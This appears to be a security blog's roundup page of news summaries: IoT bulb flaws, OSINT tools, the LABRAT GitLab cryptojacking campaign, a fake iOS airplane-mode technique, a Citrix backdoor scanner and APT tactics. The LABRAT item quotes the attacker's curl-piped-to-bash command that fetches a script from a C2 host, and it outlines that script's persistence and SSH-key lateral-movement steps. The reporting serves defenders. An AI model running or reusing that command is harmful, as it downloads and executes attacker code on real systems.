InfoSec Compliance & AI Governance For over 20 years, DISC InfoSec has been a trusted voice for cybersecurity professionals—sharing practical insights, compliance strategies, and AI governance guidance to help you stay informed, connected, and secure in a rapidly evolving landscape.
Google announced security enhancements to Google Workspace focused on enhancing threat defense controls with Google AI.
Image: Urupong/Adobe Stock
At a Google Cloud press event on Tuesday, the company announced Google Cloud’s rollout over the course of this year of new AI-powered data security tools bringing zero-trust features to Workspace, Drive, Gmail and data sovereignty. The enhancements to Google Drive, Gmail, the company’s security tools for IT and security center teams and more are designed to help global companies keep their data under lock and encrypted key and security operators outrun advancing threats.
The Internet of Things (IoT) is currently at its peak, with a rapid expansion of capabilities. This involves converting everyday items like light bulbs and plugs into smart devices controlled via smartphones. The number of IoT devices exceeded 13.8 billion in 2021, expected to quadruple by 2025, but this growth also introduces security risks exploited by cybercriminals. Researchers have discovered that even smart light bulbs, like the Tp-Link Tapo Smart Wi-Fi Multicolor Light Bulb, can be hacked to gather Wi-Fi credentials. They employed PETIoT, an IoT-focused Kill Chain, to assess vulnerabilities in these bulbs. This situation highlights challenges for cybersecurity experts dealing with the growing threats in the IoT landscape.
Because it is a cloud-enabled multicolor smart bulb, the Tapo L530E may be operated using the Tapo app on an Android or iOS device without the need for a hub. Instead, it connects directly to the home Wi-Fi network. According to the findings of the researchers, this particular kind of smart bulb is susceptible to each of the following four vulnerabilities:
LACK OF AUTHENTICATION OF THE SMART BULB WITH THE TAPO APP (8.8 CVSS SCORE, HIGH SEVERITY)
HARD-CODED, SHORT SHARED SECRET (7.6 CVSS SCORE, HIGH SEVERITY)
LACK OF RANDOMNESS DURING SYMMETRIC ENCRYPTION (4.6 CVSS SCORE, MEDIUM SEVERITY)
INSUFFICIENT MESSAGE FRESHNESS (5.7 CVSS SCORE, MEDIUM SEVERITY)
The examination and testing carried out by the security experts indicate the proximity-based attacks that were carried out on the smart bulb that was the target.The attack scenario that causes the greatest concern is one in which an attacker impersonates a bulb and retrieves information about a Tapo user account by exploiting vulnerabilities.
After that, the attacker may extract the victim’s WiFi SSID and password by using the Tapo app, allowing them to obtain access to any and all other devices that are connected to the victim’s network.
In order for the attack to be successful, the device in question must first be put into setup mode. However, the attacker has the ability to deauthenticate the bulb, which will need the user to re-configure it in order to get the light to work again.The researchers also investigated an MITM (Man-In-The-Middle) attack using a configured Tapo L530E device. This form of attack takes advantage of a vulnerability to intercept and control the connection between the app and the bulb, as well as to capture the RSA encryption keys that are used for further data transmission.
MITM attacks are also possible with unconfigured Tapo devices by leveraging a vulnerability once again by connecting to the WiFi during the setup process, bridging two networks, and routing discovery messages. This will eventually allow the attacker to retrieve Tapo passwords, SSIDs, and WiFi passwords in an easily decipherable base64 encoded form. Last but not least, a further flaw enables attackers to conduct what are known as “replay attacks.” These attacks involve recreating communications that have been sniffed in the past in order to bring about functional changes in the device.
In response, TP-Link gave the researchers their assurance that the issues that were found in their software as well as the firmware of the bulb will be fixed.
The OWASP Amass project performs network mapping of attack surfaces and external asset discovery using open-source information gathering and active reconnaissance techniques.
Osmedeus
Osmedeus is a workflow engine for offensive security that allows you to build and run a reconnaissance system on a wide range of targets, including domains, URLs, CIDRs, and GitHub repositories. It was designed to establish a strong foundation and can adapt and function automatically to perform reconnaissance tasks.
PhoneInfoga
PhoneInfoga is an advanced tool to scan international phone numbers. It allows you to gather basic information such as country, area, carrier, and line type, then use various techniques to find the VoIP provider or identify the owner. It works with a collection of scanners that must be configured for the tool to be effective.
Sherlock
Sherlock allows you to search social media accounts by username across social networks.
Shodan
Shodan is a search engine for Internet-connected devices. Discover how internet intelligence can help you make better decisions. The entire Shodan platform (crawling, IP lookups, searching, and data streaming) is available to developers. Use their API to understand whether users connect from a VPN, whether the website you’re visiting has been compromised, and more.
Social Analyzer
Social Analyzer is an API, CLI, and web app for analyzing and finding a person’s profile across social media and websites. It includes different analysis and detection modules; you can choose which modules to use during the investigation process. The analysis and public extracted information from this OSINT tool could help investigate profiles related to suspicious or malicious activities such as cyberbullying, cyber grooming, cyberstalking, and spreading misinformation.
SpiderFoot
SpiderFoot is an OSINT automation tool. It integrates with just about every data source available and utilizes a range of methods for data analysis, making that data easy to navigate. SpiderFoot has an embedded web-server for providing a clean and intuitive web-based interface but can also be used completely via the command-line.
theHarvester
theHarvester is a simple to use, yet powerful tool designed to be used during the reconnaissance stage of a red team assessment or penetration test. It performs OSINT gathering to help determine a domain’s external threat landscape. The tool gathers names, emails, IPs, subdomains, and URLs by using multiple public resources.
One of Mississippi’s largest hospital systems, Singing River Health System, suffered a cyberattack last week, leading to the shutdown of various internal services. The hospital system, which operates multiple hospitals and clinics along the Gulf Coast, detected unusual activity on its network and is cooperating with law enforcement. As a result of the attack, certain internal systems were taken offline to ensure their integrity during the investigation. The hospital’s IT security team is working to restore the offline systems, but the process is expected to take time. The hospital has not confirmed whether the attack involved ransomware or if a ransom will be paid. Patient services, including lab test results and radiology exams, are facing delays due to the attack. The incident highlights the ongoing challenges that hospitals face from cyberattacks, as this year has seen several healthcare institutions targeted by such attacks.
A Chief Information Security Officer (CISO) is vital for safeguarding an organization’s digital assets. They oversee sensitive data security, combat cyber threats, and uphold data integrity. The CISO devises security strategies, partners with stakeholders, and addresses vulnerabilities. The Help Net Security roundup showcases insights from experts through recorded videos, highlighting the pivotal responsibilities and challenges that characterize the role of CISOs.
Complete videos
Josh Yavor, CISO at Tessian, offers a personal perspective on dealing with burnout as a CISO.
Kaus Phaltankar, CEO at Caveonix discusses how in today’s complex multi-cloud landscape, the role of CISOs is more crucial than ever.
Daniel Deeney, CEO at Paladin Cloud, discusses how companies face difficulties identifying security threats within cloud environments.
Chris Groot, General Manager of Cove Data Protection at N-able, discusses enterprise CISOs’ challenges with disaster recovery.
Israel and US government agencies announced the BIRD Cyber Program, an investment of roughly $4M in projects to enhance the cyber resilience of critical infrastructure.
The BIRD Cyber Program is a joint initiative from the Israel National Cyber Directorate (INCD), the Israel-US Binational Industrial Research and Development (BIRD) Foundation, and the US Department of Homeland Security (DHS) Science and Technology Directorate (S&T) to promote projects to enhance the cyber resilience of critical infrastructure in both countries.
The program is managed by the BIRD Foundation, a non-profit organization that supports joint research activities between Israeli and American organizations. The initiative plans to invest $3.85 million in projects to develop cutting-edge defense solutions.
The total value of the projects will be increased to approximately $10 million through private-sector funding.
The initiative aims at developing new solutions for detecting and preventing cyberattacks, technologies to protect sensitive data, and improve the security of critical infrastructure systems.
The BIRD foundation provides funding of up to 50% for each approved project, it is important to note that no repayment is required if the project does not reach the sales stage.
The BIRD Cyber Program also provides mentoring for the growth of the projects.
Below are the eligibility requirements for the BIRD Cyber Program:
The project must be a joint venture between an Israeli and an American company.
The project must focus on cybersecurity or emerging technologies.
The project must have the potential to enhance the cyber resilience of critical infrastructure.
The project must be at the prototype or early development stage.
The BIRD Cyber Program will award four grants for projects related the maritime sectors, airport and air traffic, and industrial control systems (ICS).
Below are the projects approved:
Rescana (Tel-Aviv, Israel) and Trend Micro (Irving, TX) – which will develop an operational cyber threat intelligence capability to inform cyber risk maritime decision-making.
Salvador Technologies (Rehovot, Israel) and Bastazo (Fayetteville, AR) – which will develop a solution for Industrial Control Systems (ICS) vulnerability management, monitoring, and rapid recovery from cyber-attacks.
Cyber 2.0 (Rishon Letzion, Israel) and Cincinnati / Northern Kentucky International Airport (Hebron, KY) – which will develop a platform for airports and air traffic that provides continuous cyber visibility, real-time monitoring, and data traffic detection to reduce risks and boost compliance with regulations.
A fourth project – which will develop an airport cyber protection solution across the entire attack surface.
The above projects were submitted in response to the first BIRD Cyber call.
“We are pleased to jointly invest with our Israeli partners in these innovative projects and anticipate that they will deliver new capabilities to enhance the cybersecurity posture and overall resilience of vital critical sectors in both nations,” said Megan Mahle, Director of the DHS S&T Office of Industry Partnerships. Aviram Atzaba, Executive Director for International Cooperation of INCD, added: “We are proud to partner with DHS to develop cutting-edge solutions for small and medium-sized businesses and critical infrastructure cybersecurity… The BIRD mechanism continues to strengthen the strategic alliance between Israel and the United States.”
A new campaign called LABRAT is targeting GitLab with cryptojacking and proxyjacking.
LABRAT, a financially motivated operation, has been uncovered by the Sysdig Threat Research Team (TRT). Notably, the attackers have prioritized stealth and defense evasion tactics.
The LABRAT attackers used an open-source rootkit called hiding-cryptominers-linux-rootkit to conceal their crypto-mining activity by hiding files, processes, and CPU usage.
Technical Analysis – GitLab exploitation
The attacker gained initial access to a container by exploiting the known GitLab vulnerability, CVE-2021-22205. In this vulnerability, GitLab does not properly validate image files passed to a file parser, resulting in a remote command execution. There are many public exploits for this vulnerability, which is still actively exploited.
Once the attacker had access to the server, they executed the following command to download a malicious script from the C2 server. curl -kL -u lucifer:369369 https://passage-television-gardening-venue[.]trycloudflare.com/v3 | bash
The initial script allowed the attacker to achieve persistence, evade defenses, and perform lateral movement through the following actions:
Check whether or not the watchdog process was already running to kill it.
Delete malicious files if they exist from a previous run.
Disable Tencent Cloud and Alibaba’s defensive measures, a recurring feature of many attackers.
Download malicious binaries.
Create a new service with one of these binaries and if root, ran it on the fly.
Modify various cron files to maintain persistence.
Gather SSH keys to connect to those machines and start the process again, doing lateral movement.
Deletes any evidence that the above processes may have generated.
Someone at Microsoft has some explaining to do after a messed up DNS record caused emails sent from Hotmail accounts using Microsoft’s Outlook service to be rejected and directed to spam folders starting on Thursday.
Late on Thursday evening, Hotmail users began reporting that some emails were being returned with errors related to Sender Policy Framework (SPF), and thus recipient email services were unable “to confirm that [a] message came from a trusted location.”
SPF, for those unfamiliar with it, is a method of outbound email authentication that helps avoid email spoofing, impersonation and phishing. If, for example, a service like Hotmail were to have one of its subdomains removed from the DNS TXT record that stores its SPF list, then recipient services may assume it’s junk.
And that appears to be just what happened.
Reddit users posting to the Sysadmin subreddit verified they were experiencing SPF issues with Hotmail. One user pulled up Hotmail’s SPF record and found that Redmond had made two changes: removing spf.protection.outlook.com from the record, and changing the SPF failure condition from soft to hard. That meant any suspicious messages from Hotmail should be rejected rather than just sent to spam.
Microsoft support forum advisors confirmed that the issue was known, which was further confirmed by a look at the Office service status page. Per Microsoft: “Some users may receive non-delivery reports when attempting to send emails from hotmail.com.”
At time of writing, the status page indicated that “a recent change to email authentication” was the potential root cause of the outage. Microsoft said it made a configuration change to remediate impact, but shortly after said the problem may have been worse than it appeared at first glance.
“We’ve identified that additional configuration entries are impacted, and we’re implementing further configuration changes to resolve the issue,” Microsoft said. Not long after that was posted, Microsoft indicated configuration changes were complete and the problem was fixed.
Microsoft didn’t respond to our questions about the incident, only saying the issue had been resolved.
In 2022, global losses from business email compromise (BEC) and email account compromise (EAC) attacks reached a record-breaking $43 billion, as reported by the FBI. Major cybersecurity companies like Microsoft and Trend Micro noted a surge in advanced phishing attacks earlier in the year, resulting in significant financial damages to organizations of all sizes. Concerns have risen among security experts about the potential for a surge in email credential attacks due to the widespread availability of generative AI technologies like ChatGPT. These attacks could range from simple social engineering tactics to complex schemes involving domain-squatting and spear-phishing, taking advantage of previously stolen personal information. Despite increasing spending on corporate cybersecurity, the risk of such attacks continues to rise.
To aid organizations in evaluating their vulnerability to email-related security, privacy, and compliance risks, ImmuniWeb has introduced a free email security test as part of its Community Edition. This online tool performs over 200,000 security scans daily, helping small and medium-sized enterprises, educational institutions, non-profits, municipal governments, and individual developers identify a wide range of cybersecurity and compliance issues. The aim is to bolster foundational cyber resilience and information security for these entities.
The frequency of cyberattacks is increasing, particularly targeting smaller businesses. However, most small and mid-size companies cannot afford a full-time security professional. To address this, they are turning to vCISO (virtual Chief Information Security Officer) services offered by Managed Service Providers (MSPs) and Managed Security Service Providers (MSSPs). These services provide access to external cybersecurity experts at a lower cost than hiring an in-house CISO.
A report by Cynomi, based on a survey of 200 executives in the U.S. and Canada, shows the rising demand for vCISO services among SMBs and how MSPs and MSSPs are responding to this demand. The report reveals that 84% of those not currently offering vCISO services but plan to do so by the end of 2024. The number of providers offering these services has been consistently growing, with 8% in 2022, 28% in 2023, and a projected 45% in 2024.
MSPs and MSSPs are motivated to offer vCISO services due to anticipated increased revenue, higher margins, easy upselling of other cybersecurity services, and enhanced client engagement. Although they foresee challenges such as limited in-house security knowledge and a lack of skilled cybersecurity personnel, vCISO platforms help mitigate these concerns.
Cynomi, a leading vCISO platform provider, aims to conduct annual studies on the growing trend of the vCISO role. They have also created a directory of prominent vCISO service providers to help SMBs find trusted security partners, offering details about services and technology platforms used by each provider.
In the provided article, the author, who is a Chief Information Security Officer (CISO), discusses the challenges and strategies related to maintaining technical expertise while effectively communicating complex cybersecurity issues to stakeholders in a comprehensible manner.
The author emphasizes the importance of understanding the intricacies of technology in order to secure it effectively. This philosophy has driven the author to stay up-to-date with technology trends, collaborate with other security experts, and maintain a deep connection with their technical teams. The author also highlights the value of using simple metaphors to explain complex concepts, leveraging their strong technical background to convey information in a way that is easier for non-technical stakeholders to grasp.
In the context of managing cyber resilience efforts across an enterprise, the author draws parallels to managing different types of risk, categorizing them as good and bad risks. Good risks are those that contribute to business growth and innovation, while bad risks are associated with lacking proper planning and security measures. Balancing these risks requires strong relationships across the organization and constant communication.
The article also discusses the impact of digital initiatives and rapid digital transformation on the CISO’s role. While digital transformation can enhance efficiency and lower risks, challenges arise when new technologies like cloud or SaaS services are introduced without a clear understanding of their security implications. Collaboration between technology vendors, cybersecurity companies, and leadership teams is essential to address these challenges.
In the face of external events that test organizational resilience, the author presents four key principles for effective leadership: communication, agility, constant learning, and adaptability. These principles help leaders navigate uncertainties, learn from experiences, and handle change more effectively.
For a newly appointed CISO tasked with explaining complex cyber regulations to the board, the author suggests researching the backgrounds and industries of board members to tailor explanations to their perspectives. Comparisons to regulations in related industries or significant news events can help the board better understand the issues and recognize the CISO’s commitment to understanding the regulatory landscape.
In summary, the article underscores the need for CISOs to balance technical expertise with effective communication, employing metaphors to simplify complex concepts, and building strong relationships to manage cyber risks across the enterprise. It also highlights the challenges and strategies associated with digital transformation, organizational resilience, and succinctly communicating complex regulations to the board.
The Linux Distros is generally acknowledged as the third of the holy triplet of PC programs, along with Windows and macOS. Here we have provided you with a top 10 best Linux distros in 2023 for all professionals.
Hence Linux can be defined as the most rebellious among the three, as it’s flexible and customizable, including a bunch of various Best Linux distros designed by unique associations for various values.
Moreover, the Linux “core” (kernel) and most distros are free, which is a significant trading point for the OS when it is compared to Windows and macOS.
As there are several Linux distros are available for various situations. Even if you are behind an OS that is customized for desktops, workstations, laptops, servers, gaming, or A/V editing, there is a distro over there for everyone.
Hence, we are trying to summarize the most reliable and popularLinux distros accessible, each of which is customized for desktop use.
Therefore, you can install those Linux distros on a Chromebook, PC, or Mac as a substitute for your prevailing operating system, utilize both in a dual-boot scenario or in combination with one of the best practical tools out there.
Well, if you want a Linux distro similar to Windows? Or do you like to apply commands rather than click? Or do you want something special on privacy? These and several other determinants will help you decide which would be the most suitable Linux distro for you.
Usually, the top Linux distros list is customized to meet users’ requirements. For example, Kali Linux is specifically created for digital forensics and penetration testing.
Hence, here in this article, we have selected the top 10 best Linux distros list, and we have updated this list from PopularLinux distro 2022.
What is Linux Distro?
As we have said before that Linux is flexible and customizable, which includes a bunch of unique features for different uses.
Moreover, we can also say that Linux is a house to nearly each programming language, and it is a Unix-like operating system.
Hence, this open-source operating system is basically designed as per the Linux kernel and is usually collected in multiple Linux distributions.
Thus the Linux distributions, traditionally known as a distro, are operating systems that progressed from a software compilation based on the Linux kernel.
Various users use Linux by downloading one of the various Linux distros. Linux operating systems are most common to coders, programmers, and gamers.
Thus, we can say that Linux is a worldly gift that has shaped our modern lives. In today’s world, we can’t imagine a particular moment outwardly technology.
Dynamic firewall Better end-user software Virtual desktop support
Elementary OS
Easy image resizing Keyboard shortcut cheat sheet Bold use of color
Kali Linux
Full customization Full disk encryption Metapackages
MX Linux
One-click enabling event sound. Hibernation is now enabled by default. Easy and flexible installation.
Therefore, Linux has produced the most significant innovations in the creation of modern technology.
At first, Linux was not like the form it is; it has evolved a long way through varied crafting and drafting from an open-source friendly association.
Thus, without a doubt, we can say that Linux does not only appear with a delicate-looking desktop manager, but it also contributes a wide range of beneficial and productive sets of free and open-source software for performing all the basic and necessary needs of the users.
Now, without wasting much time, let’s explore the list below.
Cybersecurity reduces the risk of cyber attacks and protects against the unauthorized exploitation of systems, networks and technologies.
Cyber risk management is complex and there is no one-size-fits-all solution. IT Governance’s range of cybersecurity products and services can be tailored to suit any organization’s needs and requirements.
From training, staff awareness programs, security testing, documentation toolkits, standards, software, books and guides, ITG have everything you need to support and enhance your security program.
Data breach notification requirements are complex in the US, with various federal and state laws containing different requirements for when security incidents must be disclosed.
Some even have substantially different definitions for what a ‘data breach’ or ‘personal data’ is.
As such, it can be hard to know whether you need to report an incident, let alone how you should go about it.
We address these issues in this blog, bringing some much-needed clarity to the subject.
State laws on data breach notification
There is no single set of data protection laws in the U.S., with the rules instead comprised of a patchwork of industry-specific federal laws and state legislation.
To complicate matters further, several states have created new laws in recent years to bolster data protection requirements. For instance, New York has created the SHIELD Act, while Colorado and California have both created data privacy legislation.
Elsewhere, the U.S. government is attempting to unify data protection requirements with its National Cybersecurity Strategy.
The decision to revise data protection laws follows the introduction of the EU GDPR (General Data Protection Regulation) in 2018, which radically shifted organizations’ requirements.
Organizations in the U.S. that process EU residents’ personal data are required to comply with the GDPR, and those that conduct business across state lines will face similar compliance challenges.
The GDPR is particularly important here, because many organizations in the U.S. assume that it only applies in the EU. However, its requirements apply to any organization that processes EU residents’ personal data, which is particularly common for organizations that have an online presence.
GDPR compliance is also helpful for managing patchwork of U.S. data protection legislations. Its requirements are far stricter than any domestic laws, so achieving GDPR compliance will cover you for a range of other requirements.
This free guide explains how and when the GDPR applies in the U.S. and the steps you can take to ensure your organization meets its transatlantic data processing practices.
You’ll also learn about the Regulation’s core principles and data subject rights, and the benefits of GDPR compliance.
We also provide tips on how to write your data privacy notice and give you tips on how to further your understanding of its compliance requirements.
This summer, hundreds of thousands of people will be preparing to take off while sitting back, relaxing, and using the airplane mode setting on their iPhones. When this setting is activated, the device’s radio frequency (RF) transmission technology is turned off, which severes the user’s connection to their mobile network for the duration of the flight.This function, which was first implemented many years ago as a precautionary safety measure to shield aircraft from what was believed to be tampering with their communications or navigation systems, is also known as flight mode or fly safe mode. In point of fact, many people have exaggerated the severity of this perceived risk to aircraft safety. As a result, the regulations are not as stringent as they once were, and the quality of in-flight Wi-Fi services has increased to the point where they are now usable. Despite this, activating airplane mode continues to be an essential part of the pre-flight procedure.
Nevertheless, researchers at Jamf Threat Labs have recently uncovered and successfully demonstrated an exploit approach that allows an attacker to retain persistence on their victim’s device even when the user thinks they are offline. This technique was developed in response to a vulnerability that was revealed in a previous exploit. The approach, which has not been seen being used in the wild, relies on the successful development of a fake airplane mode “experience” by a hypothetical threat actor. This “experience” causes the device to give the appearance of being offline while in reality it is still functioning normally.
The exploit chain that was put together by Jamf ultimately results in a scenario in which processes that are controlled by an attacker are able to operate in the background undetected and unseen, while the owner of the device is blissfully oblivious that anything is wrong.
SpringBoard, which handles visible changes to the user interface (UI), and CommCentre, which controls the underlying network interface and maintains a feature that enables users to limit mobile data access for certain applications, are the two daemons that are assigned with the process of converting iOS devices to airplane mode. SpringBoard handles visible changes to the UI, while CommCentre manages the functionality. When airplane mode is activated under typical circumstances, the mobile data interface will no longer show IPv4 or 6 IP addresses. Additionally, the mobile network will become disconnected and inaccessible to the user at the level of the user space.
The Jamf team, on the other hand, was able to pinpoint the pertinent area of the target device’s console log and, from that point on, utilize a certain string—”#N User airplane mode preference changing from kFalse to KTrue”—to locate the code that was referencing it. From there, they were able to successfully access the code of the device, at which point they hooked into the function and replaced it with an empty or inactive function. They were able to do this in order to construct a bogus airplane mode, in which the device does not truly get disconnected from the internet and they still have access to it.
After that, they went after the user interface by hooking two unique Objective-C methods to inject a tiny bit of code that changed the mobile connection indicator to make it seem dark, leading the user to believe that it is switched off, and highlighting the airplane mode icon, which is represented by a picture of an airplane.If the hypothetical victim were to open Safari at this point, they would have a good reason to believe that they would be prompted to disable airplane mode or connect to a Wi-Fi network in order to access data. This would be a reasonable assumption given that it seems that aircraft mode is enabled on their device.
They would receive a separate message asking them to authorize Safari to utilize wireless data through WLAN or mobile, or WLAN alone, which would be a hint that something was wrong. However, since they are really still connected to the internet, they would see this prompt.The Jamf team was aware that this problem needed to be fixed in order for the exploit chain to be successful. As a result, they devised a strategy that enabled them to give the impression to the user that they had been disconnected from mobile data services. This was accomplished by exploiting the CommCenter feature, which blocks mobile data access for specific applications, and then disguising this action as airplane mode by hooking yet another function.
They accomplished this by creating an environment in which the user was presented a prompt to switch off airplane mode, rather than the prompt that they should have seen.The team made use of a feature of SpringBoard that prompts the “turn off airplane mode” notification after being notified to do so by CommCenter. CommCenter, in turn, receives this notification from the device kernel via a registered observer/callback function. This allowed the team to disable Safari’s internet connection without actually turning on airplane mode.
The group then discovered that CommCenter also handles a SQL database file that records the mobile data access status of each program. If an application is prevented from accessing mobile data, that application is marked with a particular flag. They would then be able to selectively prohibit or enable an application’s access to mobile data or Wi-Fi by reading a list of application bundle IDs and obtaining their default settings from this information.
Chain of exploitation
After putting all of this information together, the team had basically developed an attack chain in which their fake airplane mode seems to the victim to be running exactly as the genuine one does, with the exception that non-application programs are allowed to access mobile data.”This hack of the user interface disguises the attacker’s movement by placing the device into a state that is counterintuitive to what the user expects,” he added. “The user expects one thing, but the device behaves in a way that betrays their expectations.” “An adversary could use this to surveil the user and their surroundings at a time when no one would suspect video recording or a live microphone capturing audio,” says one researcher. “This could give an adversary an advantage in a fight.” This is feasible because to the fact that the mobile device in question is still connected to the internet, regardless of what the user interface is trying to convey to them.
According to Covington, the discovery does not fall under the normal responsible disclosure process because the exploit chain does not constitute a vulnerability in the traditional sense. Rather, it is a technique that enables an attacker to maintain connectivity once they have control of the device through another series of exploits. Researchers Did Notify Apple of the Research but no one has responded to request for comment.”
The new attack approach poses a danger, but if it were to be used in anger, it would more likely be used in a targeted attack scenario by a threat actor with very particular aims in mind than in a mass-exploitation event targeting the general public. If it were to be used in anger, however, it would be more likely to be used in anger by a threat actor with very specific goals in mind. As an example, exploitation for the purposes of espionage or surveillance by adversarial actors supported by the government against persons of interest is a scenario that is more likely than exploitation by financially driven cyber thieves.
Despite the fact that the technique is most likely to be used in a targeted attack, it is still important to raise awareness on how device user interfaces, particularly those built by trusted suppliers such as Apple, can be turned against their users. This is because of the inherent trust that people place in their mobile devices. The most crucial thing, according to him, is for consumers and security teams to better understand contemporary attack methods like those shown by the fake airplane mode study. In a sense, this is the next generation of social engineering, and it’s not too unlike to how artificial intelligence is being used to produce bogus testimonials that look to be from well-known celebrities.
Your data is an asset. Safeguarding it will help you comply with data protection laws and allow your business to thrive
A global leader in privacy guidance, audits, tools, training and software
IT Governance is a market leader in data privacy and cyber security solutions. Their broad suite of offerings is one of the most comprehensive in the world.
ITG affordable solutions have assisted numerous individuals and organizations in understanding the tangible aspects of data privacy. With substantial legal and technical proficiency, coupled with a 15-year history in cybersecurity risk management, ITG customers have complete confidence in entrusting us with their needs.
Speed up your compliance initiatives for GDPR, CPRA, and other regulations ISO 27701 by utilizing ITG collection of top-performing Tools, Templates and eBooks.
In the past, Citrix was found to have a Zero-Day vulnerability in its Citrix NetScaler Application Delivery Controller (ADC), which made it possible for malicious actors to carry out remote code execution.
It was discovered that the zero-day vulnerability was being used in the wild, hence it was assigned the CVE ID 2023-3519 and the severity rating of 9.8 (Critical). Citrix did provide fixes to address the vulnerability, but there was no way to determine whether or not a particular Citrix appliance had been compromised.
A new report states that it has been discovered that more than 1900 NetScalers are still infected with a backdoor. This information was obtained during a recent investigation.
Mandiant has launched a tool to assist business defenders in determining whether Citrix networking devices have been hacked in light of the fact that thousands of Citrix networking products are still susceptible to a major vulnerability that has not been patched and are accessible on the internet.
Citrix ADC and Citrix Gateway version 13.1, Citrix ADC and Citrix Gateway version 13.0, Citrix ADC and Citrix Gateway version 12.1, Citrix ADC, and Citrix Gateway version 12.0 are all compatible versions with which the IoC Scanner may be utilized.
On July 18, Citrix released a patch for the zero-day critical vulnerability (CVE-2023-3519) in its NetScaler application delivery controller and gateway products. The company also recommended that businesses that use the vulnerable products immediately deploy the fix. The vulnerability might be exploited to allow for the execution of unauthenticated remote code. The vulnerability is already being aggressively exploited by a number of threat organizations, who are doing so by establishing web shells within corporate networks and carrying out hundreds of attacks.
According to the findings of the researchers, there are still close to 7,000 examples available on the web. Around 460 of them had Web shells installed, most likely as a result of being compromised.
This application, which may be found on GitHub, was developed by Mandiant and has the ability to determine the file system paths of known malware, post-exploitation activities in shell history etc. The independent Bash script may be executed directly on a Citrix ADC device to search for known indications in files, processes, and ports. (The utility must be executed on the appliance in live mode while logged in as root.) According to Mandiant, it can also examine a forensic image that has been mounted for use in an investigation.
This application has a wide variety of functionality, such as scanning,
File system path that could be a malware Shell history for suspicious commands NetScaler directories and files that match with IOCs Suspicious file permissions or ownership Instances of Crontab Malicious processes running on the system
This solution, which was created in partnership with Citrix and Mandiant, has the only purpose of assisting enterprises in preventing compromised systems and scanning for evidence of their presence.
According to Mandiant, the IoC Scanner will do a “best-effort job” of detecting compromised items; nevertheless, it is possible that it may not be able to locate all infected devices or determine whether or not the device is susceptible to being exploited. According to the company, “This tool is not guaranteed to find all evidence of compromise, or all evidence of compromise related to CVE 2023-3519,” which is a vulnerability.
testssl.sh is a free command line tool, which checks a server’s service on any port for the support of TLS/SSL ciphers, protocols as well as some cryptography flaws on Linux servers, even it runs on macOS too.
It is also available in Kali Linux OS to test TLS/SSL encryption.
Key features
Clear output: you can tell easily whether anything is good or bad.
Machine readable output (CSV, two JSON formats)
No need to install or to configure something. No gems, CPAN, pip or the like.
Works out of the box: Linux, OSX/Darwin, FreeBSD, NetBSD, MSYS2/Cygwin, WSL (bash on Windows). Only OpenBSD needs bash.
A Dockerfile is provided, there’s also an official container build @ dockerhub.
Flexibility: You can test any SSL/TLS enabled and STARTTLS service, not only web servers at port 443.
Toolbox: Several command line options help you to run your test and configure your output.
Reliability: features are tested thoroughly.
Privacy: It’s only you who sees the result, not a third party.
Freedom: It’s 100% open source. You can look at the code, see what’s going on.
The development is open (GitHub) and participation is welcome.
License
This software is free. You can use it under the terms of GPLv2, see LICENSE.
Attribution is important for the future of this project — also in the internet. Thus if you’re offering a scanner based on testssl.sh as a public and/or paid service in the internet you are strongly encouraged to mention to your audience that you’re using this program and where to get this program from. That helps us to get bugfixes, other feedback and more contributions.
Compatibility
Testssl.sh is working on every Linux/BSD distribution out of the box. Latest by 2.9dev most of the limitations of disabled features from the openssl client are gone due to bash-socket-based checks.
As a result you can also use e.g. LibreSSL or OpenSSL >= 1.1.1 . testssl.sh also works on other unixoid systems out of the box, supposed they have /bin/bash >= version 3.2 and standard tools like sed and awk installed. An implicit (silent) check for binaries is done when you start testssl.sh . System V needs probably to have GNU grep installed. MacOS X and Windows (using MSYS2, Cygwin or WSL) work too.
Installation
You can download testssl.sh branch 3.2 just by cloning this git repository:
git clone –depth 1 https://github.com/drwetter/testssl.sh.git 3.2 is now the latest branch which evolved from 3.1dev. It’s in the release candidate phase. For the former stable version help yourself by downloading the ZIP or tar.gz archive. Just cd to the directory created (=INSTALLDIR) and run it off there.
Docker
Testssl.sh has minimal requirements. As stated you don’t have to install or build anything. You can just run it from the pulled/cloned directory. Still if you don’t want to pull the GitHub repo to your directory of choice you can pull a container from dockerhub and run it:
docker run –rm -ti drwetter/testssl.sh <your_cmd_line>
Or if you have cloned this repo you also can just cd to the INSTALLDIR and run
Currently in the release candidate phase for version 3.2. Bigger features will be developed in a separate branch before merged into a 3.3dev to avoid hiccups or inconsistencies.
Version 3.0.X receives bugfixes, labeled as 3.0.1, 3.0.2 and so on. This will happen until 3.2 is released.
Support for 2.9.5 has been dropped. Supported is >= 3.0.x only.
Documentation
See man page in groff, html and markdown format in ~/doc/.
https://testssl.sh/ will help to get you started for TLS/SSL encryption testing.
For the (older) version 2.8, Will Hunt provides a longer description, including useful background information.
Initially perceived as primarily targeting large corporations, advanced persistent threat (APT) attacks, often backed by state actors, have witnessed a notable surge in incidents against small and medium-sized enterprises. This expanding scope signifies that no entity is exempt, as the dynamic evolution of attack methods demands a proactive stance and ongoing fortification of security measures. This endeavor places a persistent burden on resources, especially when factoring in the diverse array of tactics, techniques, and procedures (TTPs) employed within these attacks.
Uncommon TTPs
With time, money and other resources on their side, APTs such as Cozy Bear (aka APT29), OceanLotus (aka APT32), and Grim Spider (aka APT-C-37) conduct technically intricate, cutting-edge attacks that potentially threaten any organization. One victim can also be collateral damage for an attack on a larger target.
While some of their TTPs – such as spear phishing, credential theft, living off the land (LOL), and data exfiltration – are well-known and widely documented, less common TTPs that APTs may use can wreak just as much havoc. These include:
Watering hole attacks: These attacks involve compromising websites that the target organization’s employees or individuals frequently visit. The attackers inject malicious code into these legitimate websites, causing visitors to download malware unknowingly. It’s a tactic that allows APTs to gain access to the target organization through the users’ systems without directly attacking them. One well-known attack involved the website of the US Department of Labor in 2013, where malicious code was injected to infect visitors’ systems and target government employees and contractors.
Island hopping: In these attacks, APTs target not only the primary victim organization but also other organizations within their supply chain, partners, or affiliates. By compromising less secure third-party companies first, they can use them as stepping stones to reach the ultimate target and avoid direct detection. Cozy Bear targeted the Democratic National Committee in 2016 and later used island hopping techniques to breach other US government agencies.
Fileless malware:Fileless malware resides in the system’s memory, leaving little to no trace on the hard drive. It leverages legitimate processes and tools to carry out malicious activities, making it challenging for traditional security solutions to detect. Fileless malware can be delivered through malicious scripts (such as macros and PowerShell commands), malicious registry entries, LOLBins, LOLScripts, WMI/WSH, and reflective DDL-injection (to highlight the most common ones). APT32 (OceanLotus) used fileless malware to compromise multiple organizations in Southeast Asia, including government agencies and private companies while evading detection and attribution.
